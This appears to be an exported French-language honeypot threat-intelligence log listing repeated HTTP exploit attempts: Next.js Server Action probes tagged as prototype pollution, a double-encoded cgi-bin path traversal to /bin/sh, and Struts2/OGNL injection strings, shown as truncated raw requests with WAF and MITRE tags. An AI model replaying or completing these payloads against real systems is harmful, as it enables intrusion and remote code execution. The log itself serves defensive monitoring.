Pourquoi cette classification : Règle WAF « proto-0 » · confiance 50%
Confiance classification
50%
Confiance modérée — signal unique
Risque capteur
Élevé
· 69
Confiance : Confiance 50 % — 8 tag(s) WAF
Protocole émulé
1
Signaux
Upstream
Waf Score
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Ligne de requête
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0
Règles WAF
sqli-4
rce-0
nosqli-3
proto-0
upload-0
k8s-api
Payload (extrait)
POST /api HTTP/1.1 Host: 62.3.50.33:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefo
Requête brute (extrait)
POST /api HTTP/1.1 Host: 62.3.50.33:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0 Connection: close Accept: text/x-component Next-Action: x Content-Type: multipart/form-data; boundary=0fdf55df9e0857 |
|||||||
| TCP | 3000 · HTTP | http | Prototype pollution prototype pollution · via HTTP:3000 · (tentative d'exploit) · → /_next/server | Élevée | Élevé · 69 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0001
TA0001
TA0002
Protocole
POST /_next/server UA Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100…
Émulateur
HTTP
WAF
50
Recommandation
Investiguer
Tags
Cible HTTP
POST
/_next/server
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
3000
Chemin / cible
/_next/server
Service
HTTP
Pourquoi cette classification : Règle WAF « proto-0 » · confiance 50%
Confiance classification
50%
Confiance modérée — signal unique
Risque capteur
Élevé
· 69
Confiance : Confiance 50 % — 8 tag(s) WAF
Protocole émulé
1
Signaux
Upstream
Waf Score
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Ligne de requête
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0
Règles WAF
sqli-4
rce-0
nosqli-3
proto-0
upload-0
Payload (extrait)
POST /_next/server HTTP/1.1 Host: 62.3.50.33:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/201001
Requête brute (extrait)
POST /_next/server HTTP/1.1 Host: 62.3.50.33:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0 Connection: close Accept: text/x-component Next-Action: x Content-Type: multipart/form-data; boundary=0fdf5 |
|||||||
| TCP | 3000 · HTTP | http | Prototype pollution prototype pollution · via HTTP:3000 · (tentative d'exploit) · → /_next/server | Élevée | Élevé · 69 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0001
TA0001
TA0002
Protocole
POST /_next/server UA Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100…
Émulateur
HTTP
WAF
50
Recommandation
Investiguer
Tags
Cible HTTP
POST
/_next/server
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
3000
Chemin / cible
/_next/server
Service
HTTP
Pourquoi cette classification : Règle WAF « proto-0 » · confiance 50%
Confiance classification
50%
Confiance modérée — signal unique
Risque capteur
Élevé
· 69
Confiance : Confiance 50 % — 8 tag(s) WAF
Protocole émulé
1
Signaux
Upstream
Waf Score
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Ligne de requête
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0
Règles WAF
sqli-4
rce-0
nosqli-3
proto-0
upload-0
Payload (extrait)
POST /_next/server HTTP/1.1 Host: 62.3.50.33:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/201001
Requête brute (extrait)
POST /_next/server HTTP/1.1 Host: 62.3.50.33:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0 Connection: close Accept: text/x-component Next-Action: x Content-Type: multipart/form-data; boundary=0fdf5 |
|||||||
| TCP | 3000 · HTTP | http | Prototype pollution prototype pollution · via HTTP:3000 · (tentative d'exploit) · → /app | Élevée | Élevé · 69 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0001
TA0001
TA0002
Protocole
POST /app UA Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100…
Émulateur
HTTP
WAF
44
Recommandation
Investiguer
Tags
Cible HTTP
POST
/app
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
3000
Chemin / cible
/app
Service
HTTP
Pourquoi cette classification : Règle WAF « proto-0 » · confiance 50%
Confiance classification
50%
Confiance modérée — signal unique
Risque capteur
Élevé
· 69
Confiance : Confiance 50 % — 7 tag(s) WAF
Protocole émulé
1
Signaux
Upstream
Waf Score
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Ligne de requête
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0
Règles WAF
sqli-4
rce-0
nosqli-3
proto-0
upload-0
Payload (extrait)
POST /app HTTP/1.1 Host: 62.3.50.33:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefo
Requête brute (extrait)
POST /app HTTP/1.1 Host: 62.3.50.33:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0 Connection: close Accept: text/x-component Next-Action: x Content-Type: multipart/form-data; boundary=0fdf55df9e0857 |
|||||||
| TCP | 3001 · HTTP | http | Prototype pollution prototype pollution · via HTTP:3001 · (tentative d'exploit) · → /api | Élevée | Élevé · 70 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0001
TA0001
TA0002
Protocole
POST /api UA Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100…
Émulateur
HTTP
WAF
48
Recommandation
Investiguer
Tags
Cible HTTP
POST
/api
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
3001
Chemin / cible
/api
Service
HTTP
Pourquoi cette classification : Règle WAF « proto-0 » · confiance 50%
Confiance classification
50%
Confiance modérée — signal unique
Risque capteur
Élevé
· 70
Confiance : Confiance 50 % — 8 tag(s) WAF
Protocole émulé
1
Signaux
Upstream
Waf Score
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Ligne de requête
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0
Règles WAF
sqli-4
rce-0
nosqli-3
proto-0
upload-0
k8s-api
Payload (extrait)
POST /api HTTP/1.1 Host: 62.3.50.33:3001 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefo
Requête brute (extrait)
POST /api HTTP/1.1 Host: 62.3.50.33:3001 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0 Connection: close Accept: text/x-component Next-Action: x Content-Type: multipart/form-data; boundary=0fdf55df9e0857 |
|||||||
| TCP | 3001 · HTTP | http | Prototype pollution prototype pollution · via HTTP:3001 · (tentative d'exploit) · → /_next | Élevée | Élevé · 70 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0001
TA0001
TA0002
Protocole
POST /_next UA Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100…
Émulateur
HTTP
WAF
44
Recommandation
Investiguer
Tags
Cible HTTP
POST
/_next
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
3001
Chemin / cible
/_next
Service
HTTP
Pourquoi cette classification : Règle WAF « proto-0 » · confiance 50%
Confiance classification
50%
Confiance modérée — signal unique
Risque capteur
Élevé
· 70
Confiance : Confiance 50 % — 7 tag(s) WAF
Protocole émulé
1
Signaux
Upstream
Waf Score
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Ligne de requête
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0
Règles WAF
sqli-4
rce-0
nosqli-3
proto-0
upload-0
Payload (extrait)
POST /_next HTTP/1.1 Host: 62.3.50.33:3001 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Fire
Requête brute (extrait)
POST /_next HTTP/1.1 Host: 62.3.50.33:3001 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0 Connection: close Accept: text/x-component Next-Action: x Content-Type: multipart/form-data; boundary=0fdf55df9e08 |
|||||||
| TCP | 3001 · HTTP | http | Prototype pollution prototype pollution · via HTTP:3001 · (tentative d'exploit) · → /app | Élevée | Élevé · 70 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0001
TA0001
TA0002
Protocole
POST /app UA Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100…
Émulateur
HTTP
WAF
44
Recommandation
Investiguer
Tags
Cible HTTP
POST
/app
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
3001
Chemin / cible
/app
Service
HTTP
Pourquoi cette classification : Règle WAF « proto-0 » · confiance 50%
Confiance classification
50%
Confiance modérée — signal unique
Risque capteur
Élevé
· 70
Confiance : Confiance 50 % — 7 tag(s) WAF
Protocole émulé
1
Signaux
Upstream
Waf Score
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Ligne de requête
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0
Règles WAF
sqli-4
rce-0
nosqli-3
proto-0
upload-0
Payload (extrait)
POST /app HTTP/1.1 Host: 62.3.50.33:3001 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefo
Requête brute (extrait)
POST /app HTTP/1.1 Host: 62.3.50.33:3001 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0 Connection: close Accept: text/x-component Next-Action: x Content-Type: multipart/form-data; boundary=0fdf55df9e0857 |
|||||||
| TCP | 3000 · HTTP | http | Prototype pollution prototype pollution · via HTTP:3000 · (tentative d'exploit) · → /_next/server | Élevée | Élevé · 69 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0001
TA0001
TA0002
Protocole
POST /_next/server UA Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100…
Émulateur
HTTP
WAF
50
Recommandation
Investiguer
Tags
Cible HTTP
POST
/_next/server
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
3000
Chemin / cible
/_next/server
Service
HTTP
Pourquoi cette classification : Règle WAF « proto-0 » · confiance 50%
Confiance classification
50%
Confiance modérée — signal unique
Risque capteur
Élevé
· 69
Confiance : Confiance 50 % — 8 tag(s) WAF
Protocole émulé
1
Signaux
Upstream
Waf Score
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Ligne de requête
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0
Règles WAF
sqli-4
rce-0
nosqli-3
proto-0
upload-0
Payload (extrait)
POST /_next/server HTTP/1.1 Host: 62.3.50.33:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/201001
Requête brute (extrait)
POST /_next/server HTTP/1.1 Host: 62.3.50.33:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0 Connection: close Accept: text/x-component Next-Action: x Content-Type: multipart/form-data; boundary=0fdf5 |
|||||||
| TCP | 3000 · HTTP | http | Prototype pollution prototype pollution · via HTTP:3000 · (tentative d'exploit) · → /_next | Élevée | Élevé · 69 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0001
TA0001
TA0002
Protocole
POST /_next UA Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100…
Émulateur
HTTP
WAF
44
Recommandation
Investiguer
Tags
Cible HTTP
POST
/_next
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
3000
Chemin / cible
/_next
Service
HTTP
Pourquoi cette classification : Règle WAF « proto-0 » · confiance 50%
Confiance classification
50%
Confiance modérée — signal unique
Risque capteur
Élevé
· 69
Confiance : Confiance 50 % — 7 tag(s) WAF
Protocole émulé
1
Signaux
Upstream
Waf Score
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Ligne de requête
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0
Règles WAF
sqli-4
rce-0
nosqli-3
proto-0
upload-0
Payload (extrait)
POST /_next HTTP/1.1 Host: 62.3.50.33:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Fire
Requête brute (extrait)
POST /_next HTTP/1.1 Host: 62.3.50.33:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0 Connection: close Accept: text/x-component Next-Action: x Content-Type: multipart/form-data; boundary=0fdf55df9e08 |
|||||||
| TCP | 3000 · HTTP | http | Prototype pollution prototype pollution · via HTTP:3000 · (tentative d'exploit) · → /api | Élevée | Élevé · 69 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0001
TA0001
TA0002
Protocole
POST /api UA Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100…
Émulateur
HTTP
WAF
48
Recommandation
Investiguer
Tags
Cible HTTP
POST
/api
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
3000
Chemin / cible
/api
Service
HTTP
Pourquoi cette classification : Règle WAF « proto-0 » · confiance 50%
Confiance classification
50%
Confiance modérée — signal unique
Risque capteur
Élevé
· 69
Confiance : Confiance 50 % — 8 tag(s) WAF
Protocole émulé
1
Signaux
Upstream
Waf Score
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Ligne de requête
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0
Règles WAF
sqli-4
rce-0
nosqli-3
proto-0
upload-0
k8s-api
Payload (extrait)
POST /api HTTP/1.1 Host: 62.3.50.33:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefo
Requête brute (extrait)
POST /api HTTP/1.1 Host: 62.3.50.33:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0 Connection: close Accept: text/x-component Next-Action: x Content-Type: multipart/form-data; boundary=0fdf55df9e0857 |
|||||||
| TCP | 8080 · HTTP | http | Traversal LFI lfi path traversal · via HTTP:8080 · (tentative d'exploit) · → /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%… | Élevée | Élevé · 80 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1083
TA0001
TA0002
Protocole
POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/… UA Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100…
Émulateur
HTTP
WAF
68
Recommandation
Investiguer
Tags
Cible HTTP
POST
/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
8080
Chemin / cible
/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh
Service
HTTP
Pourquoi cette classification : Sonde fichier sensible: traversal (tags internes) · Règle WAF « lfi-0 » · Injection commande dans la requête · confiance 100%
Confiance classification
100%
Risque capteur
Élevé
· 80
Confiance : Confiance 100 % — 10 tag(s) WAF
Protocole émulé
1
Signaux
Http Lfi
CRS-930100-sub
Upstream
Waf Score
Technique MITRE
T1083
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 932205
Ligne de requête
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0
Règles WAF
lfi-0
lfi-12
rce-0
rce-2
rce-5
ssrf-3
nosqli-3
Payload (extrait)
POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh HTTP/1.1 Host: 6
Requête brute (extrait)
POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh HTTP/1.1 Host: 62.3.50.33:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0 Connection: close |
|||||||
| TCP | 8080 · HTTP | http | Confluence OGNL confluence ognl · via HTTP:8080 · (tentative d'exploit) · → /struts2-showcase/index.action | Élevée | Élevé · 65 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1190
TA0001
TA0002
Protocole
POST /struts2-showcase/index.action UA Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100…
Émulateur
HTTP
WAF
67
Recommandation
Investiguer
Tags
Cible HTTP
POST
/struts2-showcase/index.action
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
8080
Chemin / cible
/struts2-showcase/index.action
Service
HTTP
Pourquoi cette classification : Type « confluence_ognl » (signaux protocolaires) · confiance 95%
Confiance classification
95%
Risque capteur
Élevé
· 65
Confiance : Confiance 95 % — Motif catalogue confirmé · 10 tag(s) WAF
Protocole émulé
1
Signaux
ET-EXPLOIT-Confluence
pat-0580
Technique MITRE
T1190
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CVE-2022-26134 Confluence OGNL
Ligne de requête
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0
Règles WAF
lfi-12
rce-0
rce-2
rce-5
ssrf-3
nosqli-3
framework-4
upload-0
rce-curl-dns
Payload (extrait)
POST /struts2-showcase/index.action HTTP/1.1 Host: 62.3.50.33:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:15
Requête brute (extrait)
POST /struts2-showcase/index.action HTTP/1.1 Host: 62.3.50.33:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0 Connection: close Content-Type: %{(#xxxx='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAU
|
|||||||
| TCP | 8080 · HTTP | http | Confluence OGNL confluence ognl · via HTTP:8080 · (tentative d'exploit) · → /struts2-showcase/index.action | Élevée | Élevé · 65 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1190
TA0001
TA0002
Protocole
POST /struts2-showcase/index.action UA Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100…
Émulateur
HTTP
WAF
60
Recommandation
Investiguer
Tags
Cible HTTP
POST
/struts2-showcase/index.action
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
8080
Chemin / cible
/struts2-showcase/index.action
Service
HTTP
Pourquoi cette classification : Type « confluence_ognl » (signaux protocolaires) · confiance 95%
Confiance classification
95%
Risque capteur
Élevé
· 65
Confiance : Confiance 95 % — Motif catalogue confirmé · 9 tag(s) WAF
Protocole émulé
1
Signaux
ET-EXPLOIT-Confluence
pat-0580
Technique MITRE
T1190
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CVE-2022-26134 Confluence OGNL
Ligne de requête
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0
Règles WAF
lfi-12
rce-0
rce-5
ssrf-3
nosqli-3
framework-4
upload-0
rce-curl-dns
Payload (extrait)
POST /struts2-showcase/index.action HTTP/1.1 Host: 62.3.50.33:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:15
Requête brute (extrait)
POST /struts2-showcase/index.action HTTP/1.1 Host: 62.3.50.33:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0 Connection: close Content-Type: %{(#xxxx='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAU
|
|||||||
| TCP | 8080 · HTTP | http | Injection de commande cmd injection · via HTTP:8080 · (tentative d'exploit) · → /index.action | Élevée | Élevé · 66 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
GET /index.action UA Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100…
Émulateur
HTTP
WAF
36
Recommandation
Investiguer
Tags
Cible HTTP
GET
/index.action
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8080
Chemin / cible
/index.action
Service
HTTP
Pourquoi cette classification : Injection de commande (tag rce-0) · confiance 100%
Confiance classification
100%
Risque capteur
Élevé
· 66
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Protocole émulé
1
Signaux
pat-0782
pat-0145
pat-0146
pat-0147
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 932190 php system
CRS 932200
CRS 932205
CRS 932206
CRS 934101
Ligne de requête
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0
Règles WAF
rce-0
rce-3
nosqli-3
php-rce-passthru
Payload (extrait)
GET /index.action?redirect%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberA
Requête brute (extrait)
GET /index.action?redirect%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue |
|||||||
| TCP | 3000 · HTTP | http | Prototype pollution prototype pollution · via HTTP:3000 · (tentative d'exploit) · → /app | Élevée | Élevé · 69 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0001
TA0001
TA0002
Protocole
POST /app UA Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100…
Émulateur
HTTP
WAF
44
Recommandation
Investiguer
Tags
Cible HTTP
POST
/app
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
3000
Chemin / cible
/app
Service
HTTP
Pourquoi cette classification : Règle WAF « proto-0 » · confiance 50%
Confiance classification
50%
Confiance modérée — signal unique
Risque capteur
Élevé
· 69
Confiance : Confiance 50 % — 7 tag(s) WAF
Protocole émulé
1
Signaux
Upstream
Waf Score
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Ligne de requête
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0
Règles WAF
sqli-4
rce-0
nosqli-3
proto-0
upload-0
Payload (extrait)
POST /app HTTP/1.1 Host: 62.3.50.33:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefo
Requête brute (extrait)
POST /app HTTP/1.1 Host: 62.3.50.33:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0 Connection: close Accept: text/x-component Next-Action: x Content-Type: multipart/form-data; boundary=0fdf55df9e0857 |
|||||||